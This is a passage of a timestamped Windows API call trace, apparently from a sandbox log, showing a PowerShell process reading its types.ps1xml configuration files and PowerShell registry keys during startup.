	[0466.814] SetErrorMode (uMode=0x1) returned 0x1
	[0466.814] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0466.814] SetErrorMode (uMode=0x1) returned 0x1
	[0466.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0466.837] SetErrorMode (uMode=0x1) returned 0x1
	[0466.837] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0466.837] SetErrorMode (uMode=0x1) returned 0x1
	[0466.840] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0466.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.840] CoTaskMemFree (pv=0x252f10) 
	[0466.846] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0466.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.846] CoTaskMemFree (pv=0x252f10) 
	[0466.848] GetACP () returned 0x4e4
	[0467.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0467.297] SetErrorMode (uMode=0x1) returned 0x1
	[0467.297] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1e0
	[0467.298] GetFileType (hFile=0x1e0) returned 0x1
	[0467.298] SetErrorMode (uMode=0x1) returned 0x1
	[0467.298] GetFileType (hFile=0x1e0) returned 0x1
	[0467.299] ReadFile (in: hFile=0x1e0, lpBuffer=0x2e35058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2e35058*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0467.301] ReadFile (in: hFile=0x1e0, lpBuffer=0x2e35058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2e35058*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0467.301] ReadFile (in: hFile=0x1e0, lpBuffer=0x2e35058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2e35058*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0467.302] ReadFile (in: hFile=0x1e0, lpBuffer=0x2e35058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2e35058*, lpNumberOfBytesRead=0x16d308*=0xcf3, lpOverlapped=0x0) returned 1
	[0467.302] ReadFile (in: hFile=0x1e0, lpBuffer=0x2e344b3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2e344b3*, lpNumberOfBytesRead=0x16d308*=0x0, lpOverlapped=0x0) returned 1
	[0467.302] ReadFile (in: hFile=0x1e0, lpBuffer=0x2e35058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2e35058*, lpNumberOfBytesRead=0x16d308*=0x0, lpOverlapped=0x0) returned 1
	[0467.305] CloseHandle (hObject=0x1e0) returned 1
	[0467.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0467.310] SetErrorMode (uMode=0x1) returned 0x1
	[0467.310] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d280 | out: lpFileInformation=0x16d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0467.310] SetErrorMode (uMode=0x1) returned 0x1
	[0467.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0467.312] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d368 | out: phkResult=0x16d368*=0x1e0) returned 0x0
	[0467.312] RegQueryValueExW (in: hKey=0x1e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d2ec, lpData=0x0, lpcbData=0x16d2e8*=0x0 | out: lpType=0x16d2ec*=0x1, lpData=0x0, lpcbData=0x16d2e8*=0x56) returned 0x0
	[0467.312] CoTaskMemAlloc (cb=0x5a) returned 0x1b818f70
	[0467.312] RegQueryValueExW (in: hKey=0x1e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d2bc, lpData=0x1b818f70, lpcbData=0x16d2b8*=0x56 | out: lpType=0x16d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d2b8*=0x56) returned 0x0
	[0467.312] CoTaskMemFree (pv=0x1b818f70) 
	[0467.312] RegCloseKey (hKey=0x1e0) returned 0x0
	[0467.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0467.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0468.300] GetSystemInfo (in: lpSystemInfo=0x16bfa0 | out: lpSystemInfo=0x16bfa0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0468.301] VirtualQuery (in: lpAddress=0x16c050, lpBuffer=0x16cf10, dwLength=0x30 | out: lpBuffer=0x16cf10*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0468.310] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0468.310] GetFileType (hFile=0x338) returned 0x1
	[0468.310] SetErrorMode (uMode=0x1) returned 0x1
	[0468.310] GetFileType (hFile=0x338) returned 0x1
	[0468.311] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.311] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.312] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.312] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.312] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.312] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.312] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.312] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.313] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.313] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.314] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.314] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.314] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.314] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.315] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.315] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.315] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.316] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.316] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.317] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.317] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.317] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.317] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.318] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.318] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.318] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.318] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.319] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.319] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.319] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.319] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.319] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.320] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.322] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.322] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.322] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.322] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.323] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.323] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.323] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.323] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1000, lpOverlapped=0x0) returned 1
	[0468.324] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x1b4, lpOverlapped=0x0) returned 1
	[0468.324] ReadFile (in: hFile=0x338, lpBuffer=0x2d13240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d308, lpOverlapped=0x0 | out: lpBuffer=0x2d13240*, lpNumberOfBytesRead=0x16d308*=0x0, lpOverlapped=0x0) returned 1
	[0468.324] CloseHandle (hObject=0x338) returned 1
	[0468.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0468.324] SetErrorMode (uMode=0x1) returned 0x1
	[0468.324] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d280 | out: lpFileInformation=0x16d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0468.324] SetErrorMode (uMode=0x1) returned 0x1
	[0468.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0468.324] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d368 | out: phkResult=0x16d368*=0x338) returned 0x0
	[0468.325] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d2ec, lpData=0x0, lpcbData=0x16d2e8*=0x0 | out: lpType=0x16d2ec*=0x1, lpData=0x0, lpcbData=0x16d2e8*=0x56) returned 0x0
	[0468.325] CoTaskMemAlloc (cb=0x5a) returned 0x1b819130
	[0468.325] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d2bc, lpData=0x1b819130, lpcbData=0x16d2b8*=0x56 | out: lpType=0x16d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d2b8*=0x56) returned 0x0
	[0468.325] CoTaskMemFree (pv=0x1b819130) 
	[0468.325] RegCloseKey (hKey=0x338) returned 0x0
	[0468.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0468.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0469.359] VirtualQuery (in: lpAddress=0x16c050, lpBuffer=0x16cf10, dwLength=0x30 | out: lpBuffer=0x16cf10*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0469.688] VirtualQuery (in: lpAddress=0x16c050, lpBuffer=0x16cf10, dwLength=0x30 | out: lpBuffer=0x16cf10*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0470.026] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0470.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.027] CoTaskMemFree (pv=0x252f10) 
	[0470.041] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d508 | out: phkResult=0x16d508*=0x338) returned 0x0
	[0470.042] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d51c, lpData=0x0, lpcbData=0x16d518*=0x0 | out: lpType=0x16d51c*=0x1, lpData=0x0, lpcbData=0x16d518*=0x74) returned 0x0
	[0470.042] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d48c, lpData=0x0, lpcbData=0x16d488*=0x0 | out: lpType=0x16d48c*=0x1, lpData=0x0, lpcbData=0x16d488*=0x74) returned 0x0
	[0470.042] CoTaskMemAlloc (cb=0x78) returned 0x2025a0
	[0470.042] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d45c, lpData=0x2025a0, lpcbData=0x16d458*=0x74 | out: lpType=0x16d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d458*=0x74) returned 0x0
	[0470.042] CoTaskMemFree (pv=0x2025a0) 
	[0470.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0470.042] SetErrorMode (uMode=0x1) returned 0x1
	[0470.042] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0470.042] SetErrorMode (uMode=0x1) returned 0x1
	[0470.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.044] SetErrorMode (uMode=0x1) returned 0x1
